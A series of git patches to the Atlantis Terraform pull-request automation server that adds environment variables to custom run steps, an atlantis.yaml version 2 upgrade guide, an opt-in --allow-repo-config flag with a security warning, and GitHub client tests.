index 392279f1eb..ed10a5090e 100644
--- a/server/events/runtime/plan_step_runner_test.go
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -11,9 +11,9 @@ import (
 	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/models"
-	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
diff --git a/server/events/runtime/run_step_runner.go b/server/events/runtime/run_step_runner.go
index 1b406737aa..0bdb7d802b 100644
--- a/server/events/runtime/run_step_runner.go
+++ b/server/events/runtime/run_step_runner.go
@@ -2,15 +2,18 @@ package runtime
 
 import (
 	"fmt"
+	"os"
 	"os/exec"
 	"strings"
 
+	"github.com/hashicorp/go-version"
 	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
 )
 
 // RunStepRunner runs custom commands.
 type RunStepRunner struct {
+	DefaultTFVersion *version.Version
 }
 
 func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
@@ -20,6 +23,18 @@ func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string,
 
 	cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec
 	cmd.Dir = path
+	tfVersion := r.DefaultTFVersion.String()
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+		tfVersion = ctx.ProjectConfig.TerraformVersion.String()
+	}
+	baseEnvVars := os.Environ()
+	customEnvVars := []string{
+		fmt.Sprintf("WORKSPACE=%s", ctx.Workspace),
+		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersion),
+		fmt.Sprintf("DIR=%s", path),
+	}
+	finalEnvVars := append(baseEnvVars, customEnvVars...)
+	cmd.Env = finalEnvVars
 	out, err := cmd.CombinedOutput()
 
 	commandStr := strings.Join(command, " ")
diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go
index 36262b235c..c206e1c491 100644
--- a/server/events/runtime/run_step_runner_test.go
+++ b/server/events/runtime/run_step_runner_test.go
@@ -4,8 +4,10 @@ import (
 	"strings"
 	"testing"
 
+	"github.com/hashicorp/go-version"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/runtime"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -16,6 +18,10 @@ func TestRunStepRunner_Run(t *testing.T) {
 		ExpOut  string
 		ExpErr  string
 	}{
+		{
+			Command: "",
+			ExpErr:  "no commands for run step",
+		},
 		{
 			Command: "echo hi",
 			ExpOut:  "hi\n",
@@ -28,23 +34,44 @@ func TestRunStepRunner_Run(t *testing.T) {
 			Command: "lkjlkj",
 			ExpErr:  "exit status 127: running \"lkjlkj\" in",
 		},
+		{
+			Command: "echo workspace=$WORKSPACE version=$ATLANTIS_TERRAFORM_VERSION dir=$DIR",
+			ExpOut:  "workspace=myworkspace version=0.11.0 dir=$DIR\n",
+		},
 	}
 
-	r := runtime.RunStepRunner{}
+	projVersion, err := version.NewVersion("v0.11.0")
+	Ok(t, err)
+	defaultVersion, _ := version.NewVersion("0.8")
+	r := runtime.RunStepRunner{
+		DefaultTFVersion: defaultVersion,
+	}
 	ctx := models.ProjectCommandContext{
-		Log: logging.NewNoopLogger(),
+		Log:        logging.NewNoopLogger(),
+		Workspace:  "myworkspace",
+		RepoRelDir: "mydir",
+		ProjectConfig: &valid.Project{
+			TerraformVersion: projVersion,
+			Workspace:        "myworkspace",
+			Dir:              "mydir",
+		},
 	}
 	for _, c := range cases {
 		t.Run(c.Command, func(t *testing.T) {
 			tmpDir, cleanup := TempDir(t)
 			defer cleanup()
-			out, err := r.Run(ctx, strings.Split(c.Command, " "), tmpDir)
+			var split []string
+			if c.Command != "" {
+				split = strings.Split(c.Command, " ")
+			}
+			out, err := r.Run(ctx, split, tmpDir)
 			if c.ExpErr != "" {
 				ErrContains(t, c.ExpErr, err)
 				return
 			}
 			Ok(t, err)
-			Equals(t, c.ExpOut, out)
+			expOut := strings.Replace(c.ExpOut, "dir=$DIR", "dir="+tmpDir, -1)
+			Equals(t, expOut, out)
 		})
 	}
 }
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index 73d21d1976..ce290b13e2 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -99,11 +99,8 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 		tfVersionStr = v.String()
 	}
 
-	// set environment variables
-	// this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
-	// and DIR variables in their scripts
-	// append current process's environment variables
-	// this is to prevent the $PATH variable being removed from the environment
+	// We add custom variables so that if `extra_args` is specified with env
+	// vars then they'll be substituted.
 	envVars := []string{
 		// Will de-emphasize specific commands to run in output.
 		"TF_IN_AUTOMATION=true",
@@ -120,11 +117,15 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr),
 		fmt.Sprintf("DIR=%s", path),
 	}
+	// Append current Atlantis process's environment variables so PATH is
+	// preserved and any vars that users purposely exec'd Atlantis with.
 	envVars = append(envVars, os.Environ()...)
 
 	// append terraform executable name with args
 	tfCmd := fmt.Sprintf("%s %s", tfExecutable, strings.Join(args, " "))
 
+	// We use 'sh -c' so that if extra_args have been specified with env vars,
+	// ex. -var-file=$WORKSPACE.tfvars, then they get substituted.
 	terraformCmd := exec.Command("sh", "-c", tfCmd) // #nosec
 	terraformCmd.Dir = path
 	terraformCmd.Env = envVars
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index be87412bb2..00048b63b4 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -252,7 +252,9 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner:       runtime.RunStepRunner{},
+			RunStepRunner: runtime.RunStepRunner{
+				DefaultTFVersion: defaultTFVersion,
+			},
 			PullApprovedChecker: e2eVCSClient,
 			WorkingDir:          workingDir,
 			Webhooks:            &mockWebhookSender{},
diff --git a/server/server.go b/server/server.go
index f122c32fc3..efeddef900 100644
--- a/server/server.go
+++ b/server/server.go
@@ -253,7 +253,9 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner:       runtime.RunStepRunner{},
+			RunStepRunner: runtime.RunStepRunner{
+				DefaultTFVersion: defaultTfVersion,
+			},
 			PullApprovedChecker: vcsClient,
 			WorkingDir:          workingDir,
 			Webhooks:            webhooksManager,
diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
index 217e8fd995..a6f517140b 100644
--- a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
+++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
@@ -15,6 +15,7 @@ workflows:
           extra_args: [-backend-config=default.backend.tfvars]
       - plan:
           extra_args: [-var-file=default.tfvars]
+      - run: echo workspace=$WORKSPACE
   staging:
     plan:
       steps:
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
index abf01fb6fc..20a4e02fb2 100644
--- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
@@ -21,6 +21,8 @@ Terraform will perform the following actions:
       id: <computed>
 Plan: 1 to add, 0 to change, 0 to destroy.
 
+workspace=default
+
 ```
 
 * To **discard** this plan click [here](lock-url).

From f29dc00edf9868b8c7204b57d3bdd863994d4cc8 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 20:58:30 +0200
Subject: [PATCH 60/69] Warn if not using version 2

---
 runatlantis.io/.vuepress/config.js            |   1 +
 .../docs/atlantis-yaml-reference.md           |   6 +-
 .../upgrading-atlantis-yaml-to-version-2.md   | 188 ++++++++++++++++++
 server/events/yaml/parser_validator_test.go   |   2 +-
 server/events/yaml/raw/config.go              |   8 +-
 server/events/yaml/raw/config_test.go         |   2 +-
 6 files changed, 202 insertions(+), 5 deletions(-)
 create mode 100644 runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md

diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
index ba8a6ce8e5..552f878aaa 100644
--- a/runatlantis.io/.vuepress/config.js
+++ b/runatlantis.io/.vuepress/config.js
@@ -40,6 +40,7 @@ module.exports = {
                 'locking',
                 'autoplanning',
                 ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
+                'upgrading-atlantis-yaml-to-version-2',
                 'security',
                 'faq',
             ],
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
index 6009f72e52..9301f72aa5 100644
--- a/runatlantis.io/docs/atlantis-yaml-reference.md
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -1,10 +1,14 @@
 # atlantis.yaml Reference
 [[toc]]
 
-::: tip
+::: tip Do I need an atlantis.yaml file?
 `atlantis.yaml` files are only required if you wish to customize some aspect of Atlantis.
 :::
 
+::: tip Where are the example use cases?
+See [www.runatlantis.io/guide/atlantis-yaml-use-cases.html](../guide/atlantis-yaml-use-cases.html)
+:::
+
 ## Example Using All Keys
 ```yaml
 version: 2
diff --git a/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
new file mode 100644
index 0000000000..b91a125ed3
--- /dev/null
+++ b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
@@ -0,0 +1,188 @@
+# Upgrading atlantis.yaml To Version 2
+These docs describe how to upgrade your `atlantis.yaml` file from the format used
+in previous versions to the latest format.
+
+## Single atlantis.yaml
+If you had multiple `atlantis.yaml` files per directory then you'll need to
+consolidate them into a single `atlantis.yaml` file at the root of the repo.
+
+For example, if you had a directory structure:
+```
+.
+├── project1
+│   └── atlantis.yaml
+└── project2
+    └── atlantis.yaml
+```
+
+Then your new structure would look like:
+```
+.
+├── atlantis.yaml
+├── project1
+└── project2
+```
+
+And your `atlantis.yaml` would look something like:
+```yaml
+version: 2
+projects:
+- dir: project1
+  terraform_version: my-version
+  workflow: project1-workflow
+- dir: project2
+  terraform_version: my-version
+  workflow: project2-workflow
+workflows:
+  project1-workflow:
+    ...
+  project2-workflow:
+    ...
+```
+
+We will talk more about `workflows` below.
+
+## Terraform Version
+The `terraform_version` key moved from being a top-level key to being per `project`
+so if before your `atlantis.yaml` was in directory `mydir` and looked like:
+```yaml
+terraform_version: 0.11.0
+```
+
+Then your new config would be:
+```yaml
+version: 2
+projects:
+- dir: mydir
+  terraform_version: 0.11.0
+```
+
+## Workflows
+Workflows are the new way to set all `pre_*`, `post_*` and `extra_arguments`.
+
+Each `project` can have a custom workflow via the `workflow` key.
+```yaml
+version: 2
+projects:
+- dir: .
+  workflow: myworkflow
+```
+
+Workflows are defined as a top-level key:
+```yaml
+version: 2
+projects:
+...
+
+workflows:
+  myworkflow:
+  ...
+```
+
+To start with, determine whether you're customizing commands that happen during
+`plan` or `apply`. You then set that key under the workflow's name:
+```yaml
+...
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      ...
+    apply:
+      steps:
+      ...
+```
+
+If you're not customizing a specific stage then you can omit that key. For example
+if you're only customizing the commands that happen during `plan` then your config
+will look like:
+```yaml
+...
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      ...
+```
+
+### Extra Arguments
+`extra_arguments` is now specified as follows. Given a previous config:
+```yaml
+extra_arguments:
+  - command_name: init
+    arguments:
+    - "-lock=false"
+  - command_name: plan
+    arguments:
+    - "-lock=false"
+  - command_name: apply
+    arguments:
+    - "-lock=false"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - init:
+          extra_args: ["-lock=false"]
+      - plan:
+          extra_args: ["-lock=false"]
+    apply:
+      steps:
+      - apply:
+          extra_args: ["-lock=false"]
+```
+
+
+### Pre/Post Commands
+Instead of using `pre_*` or `post_*`, you now can insert your custom commands
+before/after the built-in commands. Given a previous config:
+
+```yaml
+pre_init:
+  commands:
+  - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+  commands:
+  - "curl http://example.com"
+pre_plan:
+  commands:
+  - "curl http://example.com"
+post_plan:
+  commands:
+  - "curl http://example.com"
+pre_apply:
+  commands:
+  - "curl http://example.com"
+post_apply:
+  commands:
+  - "curl http://example.com"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - run: curl http://example.com
+      - init
+      - plan
+      - run: curl http://example.com
+    apply:
+      steps:
+      - run: curl http://example.com
+      - apply
+      - run: curl http://example.com
+```
+
+::: tip
+It's important to include the built-in commands: `init`, `plan` and `apply`.
+Otherwise Atlantis won't run the necessary commands to actually plan/apply.
+:::
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index 7386608675..a25f4cf2ab 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -87,7 +87,7 @@ func TestReadConfig(t *testing.T) {
 projects:
 - dir: "."
 `,
-			expErr: "version: is required.",
+			expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
 		},
 		{
 			description: "unsupported version",
diff --git a/server/events/yaml/raw/config.go b/server/events/yaml/raw/config.go
index 5644948b22..218e02e608 100644
--- a/server/events/yaml/raw/config.go
+++ b/server/events/yaml/raw/config.go
@@ -16,13 +16,17 @@ type Config struct {
 
 func (c Config) Validate() error {
 	equals2 := func(value interface{}) error {
-		if *value.(*int) != 2 {
+		asIntPtr := value.(*int)
+		if asIntPtr == nil {
+			return errors.New("is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html")
+		}
+		if *asIntPtr != 2 {
 			return errors.New("must equal 2")
 		}
 		return nil
 	}
 	return validation.ValidateStruct(&c,
-		validation.Field(&c.Version, validation.NotNil, validation.By(equals2)),
+		validation.Field(&c.Version, validation.By(equals2)),
 		validation.Field(&c.Projects),
 		validation.Field(&c.Workflows),
 	)
diff --git a/server/events/yaml/raw/config_test.go b/server/events/yaml/raw/config_test.go
index 9e415e434c..be5c880629 100644
--- a/server/events/yaml/raw/config_test.go
+++ b/server/events/yaml/raw/config_test.go
@@ -164,7 +164,7 @@ func TestConfig_Validate(t *testing.T) {
 			input: raw.Config{
 				Version: nil,
 			},
-			expErr: "version: is required.",
+			expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
 		},
 		{
 			description: "version not 1",

From 13a70c772d61fd4850353ddfb0680c284c5475a3 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 30 Jun 2018 23:14:17 +0200
Subject: [PATCH 61/69] Add new --allow-repo-config flag.

---
 cmd/server.go                                 | 15 +++++++++++---
 .../docs/atlantis-yaml-reference.md           |  4 ++++
 scripts/e2e.sh                                |  2 +-
 server/events/command_runner_test.go          |  1 -
 server/events/project_command_builder.go      | 20 +++++++++++++------
 server/events/project_command_builder_test.go |  2 ++
 server/events/terraform/terraform_client.go   |  1 -
 server/events_controller_e2e_test.go          | 13 +++++++-----
 server/server.go                              | 20 +++++++++++--------
 9 files changed, 53 insertions(+), 25 deletions(-)

diff --git a/cmd/server.go b/cmd/server.go
index 3fc9ff1aaf..67a37fa8ac 100644
--- a/cmd/server.go
+++ b/cmd/server.go
@@ -32,8 +32,9 @@ import (
 // 3. Add your flag's description etc. to the stringFlags, intFlags, or boolFlags slices.
 const (
 	// Flag names.
-	AtlantisURLFlag     = "atlantis-url"
 	AllowForkPRsFlag    = "allow-fork-prs"
+	AllowRepoConfigFlag = "allow-repo-config"
+	AtlantisURLFlag     = "atlantis-url"
 	ConfigFlag          = "config"
 	DataDirFlag         = "data-dir"
 	GHHostnameFlag      = "gh-hostname"
@@ -142,6 +143,13 @@ var boolFlags = []boolFlag{
 		description:  "Allow Atlantis to run on pull requests from forks. A security issue for public repos.",
 		defaultValue: false,
 	},
+	{
+		name: AllowRepoConfigFlag,
+		description: "Allow repositories to use atlantis.yaml files to customize the commands Atlantis runs." +
+			" Should only be enabled in a trusted environment since it enables a pull request to run arbitrary commands" +
+			" on the Atlantis server.",
+		defaultValue: false,
+	},
 	{
 		name:         RequireApprovalFlag,
 		description:  "Require pull requests to be \"Approved\" before allowing the apply command to be run.",
@@ -298,8 +306,9 @@ func (s *ServerCmd) run() error {
 
 	// Config looks good. Start the server.
 	server, err := s.ServerCreator.NewServer(userConfig, server.Config{
-		AllowForkPRsFlag: AllowForkPRsFlag,
-		AtlantisVersion:  s.AtlantisVersion,
+		AllowForkPRsFlag:    AllowForkPRsFlag,
+		AllowRepoConfigFlag: AllowRepoConfigFlag,
+		AtlantisVersion:     s.AtlantisVersion,
 	})
 	if err != nil {
 		return errors.Wrap(err, "initializing server")
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
index 9301f72aa5..a2fbe21755 100644
--- a/runatlantis.io/docs/atlantis-yaml-reference.md
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -9,6 +9,10 @@
 See [www.runatlantis.io/guide/atlantis-yaml-use-cases.html](../guide/atlantis-yaml-use-cases.html)
 :::
 
+## Enabling atlantis.yaml
+The atlantis server must be running with `--allow-repo-config` to allow Atlantis
+to use `atlantis.yaml` files.
+
 ## Example Using All Keys
 ```yaml
 version: 2
diff --git a/scripts/e2e.sh b/scripts/e2e.sh
index a1d3a44eea..02c6021658 100755
--- a/scripts/e2e.sh
+++ b/scripts/e2e.sh
@@ -8,7 +8,7 @@ ${CIRCLE_WORKING_DIRECTORY}/scripts/e2e-deps.sh
 cd "${CIRCLE_WORKING_DIRECTORY}/e2e"
 
 # start atlantis server in the background and wait for it to start
-./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" &> /tmp/atlantis-server.log &
+./atlantis server --gh-user="$GITHUB_USERNAME" --gh-token="$GITHUB_PASSWORD" --data-dir="/tmp" --log-level="debug" --repo-whitelist="github.com/runatlantis/atlantis-tests" --allow-repo-config &> /tmp/atlantis-server.log &
 sleep 2
 
 # start ngrok in the background and wait for it to start
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index 5f0d2ce4c0..0b1518c09c 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -41,7 +41,6 @@ var githubGetter *mocks.MockGithubPullGetter
 var gitlabGetter *mocks.MockGitlabMergeRequestGetter
 var ch events.DefaultCommandRunner
 var logBytes *bytes.Buffer
-var projectCommandRunner *mocks.MockProjectCommandRunner
 
 func setup(t *testing.T) {
 	RegisterMockTestingT(t)
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index a530ee31d9..549bbb3172 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -24,12 +24,14 @@ type ProjectCommandBuilder interface {
 }
 
 type DefaultProjectCommandBuilder struct {
-	ParserValidator  *yaml.ParserValidator
-	ProjectFinder    ProjectFinder
-	VCSClient        vcs.ClientProxy
-	WorkingDir       WorkingDir
-	WorkingDirLocker WorkingDirLocker
-	RequireApproval  bool
+	ParserValidator     *yaml.ParserValidator
+	ProjectFinder       ProjectFinder
+	VCSClient           vcs.ClientProxy
+	WorkingDir          WorkingDir
+	WorkingDirLocker    WorkingDirLocker
+	RequireApproval     bool
+	AllowRepoConfig     bool
+	AllowRepoConfigFlag string
 }
 
 type TerraformExec interface {
@@ -63,6 +65,9 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 		ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
 	} else {
 		ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+		if !p.AllowRepoConfig {
+			return nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+		}
 	}
 
 	// We'll need the list of modified files.
@@ -201,6 +206,9 @@ func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, wo
 	if !hasAtlantisYAML {
 		return nil, nil, nil
 	}
+	if !p.AllowRepoConfig {
+		return nil, nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+	}
 
 	// If they've specified a project by name we look it up. Otherwise we
 	// use the dir and workspace.
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index 111e790f40..1a50de40be 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -195,6 +195,7 @@ projects:
 				ParserValidator:  &yaml.ParserValidator{},
 				VCSClient:        vcsClient,
 				ProjectFinder:    &events.DefaultProjectFinder{},
+				AllowRepoConfig:  true,
 			}
 
 			ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
@@ -416,6 +417,7 @@ projects:
 					ParserValidator:  &yaml.ParserValidator{},
 					VCSClient:        vcsClient,
 					ProjectFinder:    &events.DefaultProjectFinder{},
+					AllowRepoConfig:  true,
 				}
 
 				cmdCtx := &events.CommandContext{
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index ce290b13e2..bd2e6de704 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -42,7 +42,6 @@ type DefaultClient struct {
 const terraformPluginCacheDirName = "plugin-cache"
 
 // zeroPointNine constrains the version to be 0.9.*
-var zeroPointNine = MustConstraint(">=0.9,<0.10")
 var versionRegex = regexp.MustCompile("Terraform v(.*)\n")
 
 func NewClient(dataDir string) (*DefaultClient, error) {
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 00048b63b4..b50215b3e8 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -270,11 +270,14 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 		AllowForkPRs:             allowForkPRs,
 		AllowForkPRsFlag:         "allow-fork-prs",
 		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
-			ParserValidator:  &yaml.ParserValidator{},
-			ProjectFinder:    &events.DefaultProjectFinder{},
-			VCSClient:        e2eVCSClient,
-			WorkingDir:       workingDir,
-			WorkingDirLocker: locker,
+			ParserValidator:     &yaml.ParserValidator{},
+			ProjectFinder:       &events.DefaultProjectFinder{},
+			VCSClient:           e2eVCSClient,
+			WorkingDir:          workingDir,
+			WorkingDirLocker:    locker,
+			AllowRepoConfigFlag: "allow-repo-config",
+			AllowRepoConfig:     true,
+			RequireApproval:     false,
 		},
 	}
 
diff --git a/server/server.go b/server/server.go
index efeddef900..0d7c595932 100644
--- a/server/server.go
+++ b/server/server.go
@@ -80,6 +80,7 @@ type Server struct {
 // the config is parsed from a YAML file.
 type UserConfig struct {
 	AllowForkPRs        bool   `mapstructure:"allow-fork-prs"`
+	AllowRepoConfig     bool   `mapstructure:"allow-repo-config"`
 	AtlantisURL         string `mapstructure:"atlantis-url"`
 	DataDir             string `mapstructure:"data-dir"`
 	GithubHostname      string `mapstructure:"gh-hostname"`
@@ -104,8 +105,9 @@ type UserConfig struct {
 
 // Config holds config for server that isn't passed in by the user.
 type Config struct {
-	AllowForkPRsFlag string
-	AtlantisVersion  string
+	AllowForkPRsFlag    string
+	AllowRepoConfigFlag string
+	AtlantisVersion     string
 }
 
 // WebhookConfig is nested within UserConfig. It's used to configure webhooks.
@@ -232,12 +234,14 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
 		ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
-			ParserValidator:  &yaml.ParserValidator{},
-			ProjectFinder:    &events.DefaultProjectFinder{},
-			VCSClient:        vcsClient,
-			WorkingDir:       workingDir,
-			WorkingDirLocker: workingDirLocker,
-			RequireApproval:  userConfig.RequireApproval,
+			ParserValidator:     &yaml.ParserValidator{},
+			ProjectFinder:       &events.DefaultProjectFinder{},
+			VCSClient:           vcsClient,
+			WorkingDir:          workingDir,
+			WorkingDirLocker:    workingDirLocker,
+			RequireApproval:     userConfig.RequireApproval,
+			AllowRepoConfig:     userConfig.AllowRepoConfig,
+			AllowRepoConfigFlag: config.AllowRepoConfigFlag,
 		},
 		ProjectCommandRunner: &events.DefaultProjectCommandRunner{
 			Locker:           projectLocker,

From 6d8766403beef74d480e3d43ef6ad566eff2316c Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sun, 1 Jul 2018 22:12:50 +0200
Subject: [PATCH 62/69] Test GitHub client.

---
 .../events/vcs/github_client_internal_test.go |  14 ++
 server/events/vcs/github_client_test.go       | 149 ++++++++++++++++++
 2 files changed, 163 insertions(+)
 create mode 100644 server/events/vcs/github_client_test.go

diff --git a/server/events/vcs/github_client_internal_test.go b/server/events/vcs/github_client_internal_test.go
index 0769e8691f..71ac0371f0 100644
--- a/server/events/vcs/github_client_internal_test.go
+++ b/server/events/vcs/github_client_internal_test.go
@@ -76,3 +76,17 @@ func TestSplitAtMaxChars(t *testing.T) {
 		})
 	}
 }
+
+// If the hostname is github.com, should use normal BaseURL.
+func TestNewGithubClient_GithubCom(t *testing.T) {
+	client, err := NewGithubClient("github.com", "user", "pass")
+	Ok(t, err)
+	Equals(t, "https://api.github.com/", client.client.BaseURL.String())
+}
+
+// If the hostname is a non-github hostname should use the right BaseURL.
+func TestNewGithubClient_NonGithub(t *testing.T) {
+	client, err := NewGithubClient("example.com", "user", "pass")
+	Ok(t, err)
+	Equals(t, "https://example.com/api/v3/", client.client.BaseURL.String())
+}
diff --git a/server/events/vcs/github_client_test.go b/server/events/vcs/github_client_test.go
new file mode 100644
index 0000000000..04678bc5fb
--- /dev/null
+++ b/server/events/vcs/github_client_test.go
@@ -0,0 +1,149 @@
+package vcs_test
+
+import (
+	"crypto/tls"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/vcs"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+// GetModifiedFiles should make multiple requests if more than one page
+// and concat results.
+func TestGithubClient_GetModifiedFiles(t *testing.T) {
+	respTemplate := `[
+  {
+    "sha": "bbcd538c8e72b8c175046e27cc8f907076331401",
+    "filename": "%s",
+    "status": "added",
+    "additions": 103,
+    "deletions": 21,
+    "changes": 124,
+    "blob_url": "https://github.com/octocat/Hello-World/blob/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+    "raw_url": "https://github.com/octocat/Hello-World/raw/6dcb09b5b57875f334f61aebed695e2e4193db5e/file1.txt",
+    "contents_url": "https://api.github.com/repos/octocat/Hello-World/contents/file1.txt?ref=6dcb09b5b57875f334f61aebed695e2e4193db5e",
+    "patch": "@@ -132,7 +132,7 @@ module Test @@ -1000,7 +1000,7 @@ module Test"
+  }
+]`
+	firstResp := fmt.Sprintf(respTemplate, "file1.txt")
+	secondResp := fmt.Sprintf(respTemplate, "file2.txt")
+	testServer := httptest.NewTLSServer(
+		http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			switch r.RequestURI {
+			// The first request should hit this URL.
+			case "/api/v3/repos/owner/repo/pulls/1/files?per_page=300":
+				// We write a header that means there's an additional page.
+				w.Header().Add("Link", `<https://api.github.com/resource?page=2>; rel="next",
+      <https://api.github.com/resource?page=2>; rel="last"`)
+				w.Write([]byte(firstResp)) // nolint: errcheck
+				return
+			// The second should hit this URL.
+			case "/api/v3/repos/owner/repo/pulls/1/files?page=2&per_page=300":
+				w.Write([]byte(secondResp)) // nolint: errcheck
+			default:
+				t.Errorf("got unexpected request at %q", r.RequestURI)
+				http.Error(w, "not found", http.StatusNotFound)
+				return
+			}
+		}))
+
+	testServerURL, err := url.Parse(testServer.URL)
+	Ok(t, err)
+	client, err := vcs.NewGithubClient(testServerURL.Host, "user", "pass")
+	Ok(t, err)
+	defer disableSSLVerification()()
+
+	files, err := client.GetModifiedFiles(models.Repo{
+		FullName:          "owner/repo",
+		Owner:             "owner",
+		Name:              "repo",
+		CloneURL:          "",
+		SanitizedCloneURL: "",
+		VCSHost: models.VCSHost{
